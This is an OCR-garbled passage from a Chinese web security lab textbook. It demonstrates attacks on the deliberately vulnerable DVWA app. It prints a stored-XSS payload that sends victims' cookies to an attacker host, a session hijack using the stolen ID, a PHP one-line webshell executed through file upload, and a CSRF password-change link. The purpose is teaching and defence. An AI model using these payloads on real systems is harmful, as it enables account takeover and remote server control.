fwrite( $ fp, "URI:". $ cookie. "| ||"); 
fclose( $ fp); 

?> 


(2) 攻击 者 在 IP 地 址 为 192. 168. 1. 140 的 计算 机 上 利用 浏览 器 访问 IP 地 址 为 
192. 168. 1. 66 的 Web 服务 器 上 的 DVWA ,以 用 户 Smithy 的 身份 登录 系统 ,如 图 11. 22 所 示 。 


É @ 192.168.1.66/dvwa/index. php C |[@- ccs 


Welcome to Damn Vulnerable Web App! 

Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable Its тат goals. 

soto be n Sd эєсийу lessons to les (bet skis and toc in a logal eminent, hé vel 5 developers 

better understand. web applications. web 

application secunty т a class room enwronment. 

WARNING! 

Dare Vulnerable Ve Ap is dame reete Do и upland o yout hosting ркм te hm folder or 

any temet си) web server as 4 wi be compronssed We recommend downloading and tali * ^17 

loa fecal reci ai your LAN wich a ned scd ра 

Disclaimer 

We do not iake responsivity for e way in мс any one vaes this appicaton We have made the purposes of 
тейит a oa н слу We haw ve gren жите» and шеп measures 1o 

users DVWA on to Re web sener3 N your web server 15 compromised va an in 
ENANA kis та ош reperi à is the responsibility of the person/s who uploaded and installed it 
General Instructions 


The һер button allows you to мем hits/tips for each vulnerability and for each security level on their respectivo 
page 
图 11.22 攻击 者 访问 Web 服务 器 上 的 DVWA 


单 击 左 侧 栏 中 的 KSS stored ,出 现 如 图 11. 23 所 示 的 留言 板 对 话 框 ,在 Name 栏 输入 
“test” ,在 Message 栏 输入 “< script > new Image(). sre =" http://192. 168. 1. 140/ 
getcookie. php?" 十 document. cookie;</script >”, 单 击 “Sign Guestbook” 按 钮 提交 ,该 留 
言 信 息 包 含 攻 击 者 注入 的 JavaScript 代码 ,由 于 Web 服务 器 没有 对 用 户 输入 的 内 容 作 过 
滤 , 因 而 这 些 信息 被 存储 在 Web 服务 器 的 数据 库 中 ,其 他 用 户 只 要 单 击 DVWA 首页 中 
的 XSS stored 栏目 访问 留言 板 就 会 在 客户 端 浏 览 器 中 执行 JavaScript 代码 。 


[IE Damn vulnerable Web App (DVWA) .. 
Ф.  & 192.168.1.66/dvwa/vulns 


Vulnerability: Stored Cross Site Scripting (XSS) 


к=з дег == 

эта) ассир 7182 168 1.40 
Bike] MA getcookie php? «document cookie; «/scnpt»| 
em | ER 


图 11.23 在 留言 板 中 注入 JavaScript 代码 
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(3) 受害 者 在 IP 地 址 为 192. 168. 1. 33 的 计算 机 上 打开 浏览 器 访问 ІР 地 址 为 
192. 168. 1. 66 的 Web 服务 器 上 的 DVWA, 以 用 户 admin 的 身份 登录 系统 , 单 击 DVWA 
首页 中 的 XSS stored 栏目 ,受害 者 浏览 器 会 执行 “< script > new Image(). src 一 "http:// 
192. 168. 1. 140/getcookie. php?" + document. cookie;</script > 代码 ,该 代码 访问 攻击 
者 的 Web 服务 器 ,将 受害 者 的 cookie 存储 在 攻击 者 的 cookie. txt 文件 中 。 

这 时 ,攻击 者 在 攻击 机 的 xampp\htdocs 目录 下 发 现 新 增 一 个 cookie. txt 文件 ,打开 
文件 发 现 记录 了 受害 者 访问 攻击 者 Web 服务 器 时 的 URI, 其 中 包含 了 受害 者 的 
SESSIONID, 如 图 11. 24 所 示 。 


CE #1 


URI: /getcookie. php?security-low;*20PHPSESSID-|s3oct2ht7fv2hu651sgkan49s6 | | | 


图 11. 24 获取 到 受害 者 Session ID 


(4) 攻击 者 在 IP 地 址 为 192. 168. 1. 140 的 计算 机 上 打开 浏览 器 firefox, 并 打开 抓 包 
组 件 Live HTTP headers. 719] IP 地 址 为 192. 168. 1. 66 的 Web 服务 器 上 的 DVWA, Ш 
用 户 Smithy 的 身份 登录 系统 ,如 图 11. 25 所 示 。 


[7 Mozilla Firefox Start Page Ma с 
ЖАР o жа 
Ele Edit View History Bookmarks [Tools] Help| 
@ Mozilla Firefox Start Page Downloads CtrlJ 
EJ @ search or enter address ad тш 

mm] — | SetUpSync. 
Show/hide hackbar F9 
Web Developer » 
Page Info 
Options 
Live HTTP headers 


图 11.25 启动 抓 包 组 件 


O) 登录 系统 后 ,打开 抓 包 窗 口 :发 现 已 经 抓 取 了 登录 过 程 数据 包 , 将 鼠标 移 至 最 后 
一 个 请 求 数据 包 后 , 单 击 选中 其 中 的 一 行 数据 再 单 击 Replay 按钮 ,如 图 11. 26 所 示 。 

(6) 在 出 现 的 如 图 11.27 所 示 的 Replay 对 话 框 中 ,将 Cookie 头 部 中 的 PHPSESSID 
的 值 修改 为 cookie. txt 窃取 到 的 受害 者 的 PHPSESSID 的 值 , 单 击 Replay 按钮 ,发 送 修 
改 后 的 HTTP 请 求 数据 包 , 回 到 网 页 会 发 现 用 户 的 身份 已 经 从 Smithy 转换 为 admin, 攻 
击 者 成 功 冒充 受害 者 的 身份 。 
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GET /dvwa/index.php НТТР/1.1 
Host: 192.168.1.6 


User-Agent: Mozilla/5.0 (Windows NT 6.1; гу:24.0) Gecko/20100101 Firefox/24.0 
Accept: text/html, application/xhtml-«xml,application/xml;q0.9,*/*:30.8 
Accept-Language: en-US,en;q-0.5 

incoding deflate 


; PHPSESSID=n2apkjskaltkh9n2qn2nqvll94 
Connection: keep-alive 


HTTP/1.1 200 OK 

Date: Thu, 15 Nov 2018 08:13:02 GMT 

Server: Apache/2.4.2 (Win32) OpenSSL/1.0.1c PHP/5.4.4 
X-Powered-By: РНР/5.4.4 

Expires: Tue, 23 Jun 2009 12:00:00 GMT 
Cache-Control: no-cache, must-revalidate 


图 11.26 捕获 包 数据 


~ http;//192.168.1.66/dvwa/dvwa/images/logo.png 

HTTP Headers 

| Host: 192.168.1.66 

| User-Agent: Mozilla/5.0 (Windows NT 6.1; гу:24.0) Gecko/20100101 Firefox/24.0 
Accept: image/png.image/*:q70.8,*/*:3-0.5 

Accept-Language: en-US,en;q-0.5 

| Accept-Encoding: gzip, deflate 

| Referer: http//192.168.L66/dvwo/index php 
| Cookie: security-low; PHPSESSID: 
| Connection: keep-alive 


[Г] Send POST Content ? 


L 
Content-Length: 0 


图 11.27 修改 HTTP 请 求 数据 的 НТТР 的 PHPSESSID fË 
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11.6 文件 上 传 攻击 实验 


11.6.1 实验 目的 
理解 文件 上 传 攻击 的 原理 ,掌握 文件 上 传 攻击 的 基本 方法 。 
11.6.2 实验 内 容 及 环境 


1. 实验 内 容 

在 DVWA 中 ,利用 文件 上 传 漏洞 上 传 一 句 话 木马 脚本 文件 ,实现 对 Web 服务 器 的 
远程 控制 。 

2. 实验 环境 

实验 拓扑 如 图 11. 28 所 示 ,需要 两 台 主 流 配置 计算 机 ,安装 Windows 7 操作 系统 ,分 
别 作为 攻击 机 和 Web 服务 器 ,其 中 Web 服务 器 安装 XAMPP ,部 署 DVWA。 攻 击 机 安装 
firefox ,安装 HackBar 组 件 。 


N 
55 " 
Web 服 务 器 


攻击 机 
ІР: 192.168.1.140 IP; 192.168.1.66 
图 11.28 实验 拓扑 


11.6.3 实验 步骤 
CD 攻击 者 事先 准备 好 一 个 一 句 话 木马 文件 horse. php, 文 件 内 容 为 : 


<?php 
@eval( $ POST['apple']); 

?> 

(2) 攻击 机 在 IP 地 址 为 192. 168. 1. 140 的 计算 机 上 打开 浏览 器 firefox, 访 问 IP 地 
址 为 192. 168. 1. 66 的 Web 服务 器 上 的 DVWA, 以 用 户 Smithy 的 身份 登录 系统 ,出 现 如 
图 11. 29 所 示 的 DVWA 的 主 界面 , 单 击 图 11. 29 中 左 侧 栏目 列 中 的 Upload 按钮 。 

G) 出 现 如 图 11. 30 所 示 的 Upload 界面 ,在 界面 中 单 击 Browse 按钮 ,选择 预先 准备 
好 的 horse. php , 单 击 Upload 按钮 上 传 该 文件 至 Web 服务 器 。 

(D 上 传 成 功 后 ,系统 会 提示 文件 上 传 成 功 ,并 显示 了 文件 上 传 的 路 径 ,如 图 11.31 
所 示 。 

(5) 在 Firefox 中 安装 HackBar 组 件 , 在 URL 文本 框 中 输入 木马 访问 路 径 : http:// 
192. 168. 1. 66/dvwa/hackable/uploads/horse. php, 单 击 Enable Post data 复 选 框 ,在 出 
现 的 Post data 对 话 框 中 输入 “apple 二 system(“ifconfig”);”, 单 击 Execute 按钮 ,可 以 看 到 利 
用 一 句 话 木马 ,攻击 者 可 以 控制 Web 服务 器 所 在 计算 机 执行 任意 命令 ,如 图 11. 32 所 示 。 
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Є 8 192168166/dwwa/index php її т е|[@- soge 


Welcome to Damn Vulnerable Web App! 


Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. hs main goals 
are to be an aid for securty professionals to test their skils and tools in а legal environment, help web developers. 
better understand the processes of secunng web appbcabons and ad teachers/studerts to leach/leam web 
application zecunty m a class room envronment. 


WARNING! 

he er AER NN S he provider's public html folder or 
апу rieret facing web server as 1 wil be compromised We recommend downloading and installing з. 
anto a local machine made your LAN which is used solely for tesng 

Disclaimer 


We do not take responsibiity for the way in wich any one uses this application. We have made the purposes of 
the application clear and й should not be used maliciously We have gwen wamings and taken measures to 
prevent users from installing DVWA on to ive web servers. If your web sewer із compromised via an installation of 
DVWA it is not our responsibiity t is the responsibit of the person/s who uploaded and installed й. 


General Instructions 
The help button allows you to wew hits/tips for each vulnerability and for each security level on their respective. 
Page 


图 11.29 DVWA 主 界面 


CT c IBI уе 


Vulnerability: File Upload 


Choose an image to upload 
[Browse | No fle selected. 


" | 


图 11. 30 上 传 脚本 文件 


人 LEE c|[BI- coco 


Vulnerability: File Upload 


Choose an image to upload 
Browse.) No ie selected 


Logona.) 


/hackable/ wloads/horse. php succesfully uploaded! 


More info 


| 


图 11.31 脚本 文件 上 传 成 功 
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Бе Edit” View" History. Bookmarks Тоо | Help. 
| E http;//192.168.1.6...uploads/horse.php. 


(€) @ 192168.1.66/dvwa/hackable/uploads/horse.php 


INT 了 | = 9 SQL- XSS- Encryption- Encoding- Other- 
ХӘ Load URL http://192. 168. 1. 68/dvra/hackable/uploads/hor se. php 
A Split URL 
0) Execute 

Enable Post data Enable Referrer 
Post data applecsysten ( ipconfig] ): 


图 11.32 控制 Web 服务 器 


11.7 CSRF 攻击 实验 


11.7.1 实验 目的 
理解 CSRF 跨 站 请 求 伪造 攻击 的 原理 ,掌握 CSRF 跨 站 请 求 伪造 攻击 的 基本 方法 。 


11.7.2. 实验 内 容 及 环境 


1. 实验 内 容 

本 实验 利用 DVWA 系统 进行 ,利用 受害 者 尚未 失效 的 身份 信息 (cookie、 会 话 等 ) 诱 
骗 其 单 击 恶 意 链 接 或 访问 包含 有 恶意 代码 的 页 面 ,在 受害 者 不 知情 的 情况 下 以 受害 者 的 
身份 向 Web 服务 器 发 送 请 求 , 从 而 完成 修改 密码 的 操作 。 与 XSS 的 主要 区 别 在 于 CSRF 
并 没有 盗 取 cookie 而 是 直接 利用 。 

2. 实验 环境 

实验 网 络 拓扑 如 图 11. 33 所 示 ,需要 两 台 主 流 配置 计算 机 ,安装 Windows 7 操作 系 
统 , 分 别 作为 攻击 机 和 Web 服务 器 ,其 中 Web 服务 器 安装 XAMPP, 部 署 DVWA。 攻 击 


机 安装 firefox。 
e - J 
<5 


攻击 机 Web 服 务 器 
ІР: 192.168.1.140 ІР: 192.168.1.66 


图 11.33 实验 网 络 拓扑 


11.7.3 ”实验 步骤 
(1) 攻击 机 在 IP 地 址 为 192. 168. 1. 140 的 计算 机 上 打开 浏览 器 firefox, 访 问 IP 地 
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址 为 192. 168. 1. 66 的 Web 服务 器 上 的 DVWA ,以 用 户 Smithy 的 身份 登录 系统 ,出 现 如 
图 11. 34 所 示 的 DVWA 的 主 界面 。 


€& @ 192.168.166/dwwa/index.php C |B- soge 


Welcome to Damn Vulnerable Web App! 
Dane Vulnerable Web App ПУМА) is a PHPMMJSOL wob application that is damn wnerable ts main goals 
are to be an aid for secunty professionals to test therr skills and tools in a legal environ help wet rp 
better understand the processes of secunng web applicati eer erre don d ttg 

"m a class room envi 
WARNING! 
Dan Vulnerable Web App is darn wineratie! Do not upload t to your hosting povders uli ит deo 
any internet facing web server as it will be compromised. We recommend downloading and installing XAMPP 
onto a local machine inside your LAN which s used solely for testing 
Disclaimer 


We do no taka respon y tor the way in which any one voes this арса, We have made the purposes of 
shouid not be us taken measures to 

кок users E pee E DVWA on to live web servers. Mem web server is compromised ма an installation of 

DVWA tt is not our responsibiity itis the responsibilty of the person/s who uploaded and installed t 

General Instructions 


The help button allows you to view hits/tips for each vulnerablity and for each security level on their respective. 
page 


图 11.34 DVWA 主 界面 
(2) 单 击 左 侧 栏目 列 中 的 CSRF 按钮 ,出 现 如 图 11. 35 所 示 的 修改 当前 登录 用 户 密 
码 的 界面 。 


Є 8 10161668 е |[Bl- coooe 


сарга 


E Enable Postdata [E] Enable Referrer 


Vulnerability: Cross Site Request Forgery (CSRF) 


Change your admin password: 


New password: 


Confirm new password: 


Change 


图 11.35 CSRF 演示 案例 


(3) 输入 新 密码 和 确认 密码 后 , 单 击 Change 按钮 ,可 以 观察 到 用 户 输入 的 信息 通 
过 URL 中 的 参数 传递 给 Web 服务 器 , Web 服务 器 根据 这 些 信息 修改 当前 登录 用 户 的 
密码 ,通过 抓 取 数据 包 可 以 看 到 用 户 发 出 的 请 求 数据 包 中 包含 当前 用 户 身份 cookie 信 
息 。 因 而 只 要 用 户 的 cookie 没有 失效 ,攻击 者 发 送 一 个 链接 http://192. 168. 1. 66/ 
dvwa/ vulnerabilities/csrf/? password new = 123& password | conf = 1238-Change = 
Change # , 诱 使 受害 者 单 击 该 链接 ,就 能 修改 受害 者 的 密码 ,实现 CSRF 攻击 ,如 图 11. 36 
所 示 。 
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[IE Dame Vulnerable Web App ovwA -| 


Є @ 1921681665 eire "Ipassword.newz1234568password conf 1234568 Changez Change e |B- coge 
INT 7] = 。sat XSS- Erenpüon- Encoding” Other 
|a) Load URL. 
2 заци 
кесле 


Enable Post data Е) Enable Referrer 


[1] Vulnerability: Cross Site Request Forgery (CSRF) 
[келей — |  [ Change your admin password: 

Sew | EE 

— mM 

ex 

一 一 一 Penard Changed 

SOL injection | 


图 11.36 CSRF 演示 案例 


11.8 练 J 题 


(1) 在 基于 错误 信息 利用 的 SQL 注入 中 ,由 于 系统 对 错误 信息 显示 长 度 有 限制 , 因 
而 通过 文中 注入 的 SQL 语句 获取 的 数据 库 名 称 被 截断 了 ,没有 显示 所 有 数据 库 信息 , 思 
考 如 何 修改 注入 语句 使 得 可 以 完整 获取 所 有 数据 库 名 称 。 

(2) 根据 SQL 注入 的 原理 和 实验 过 程 ,分 析 可 能 防御 该 攻击 的 方法 。 

(3) 根据 СКЕ 跨 站 请 求 伪 造 的 原理 和 实验 过 程 ,分 析 可 能 防御 该 攻击 的 方法 。 
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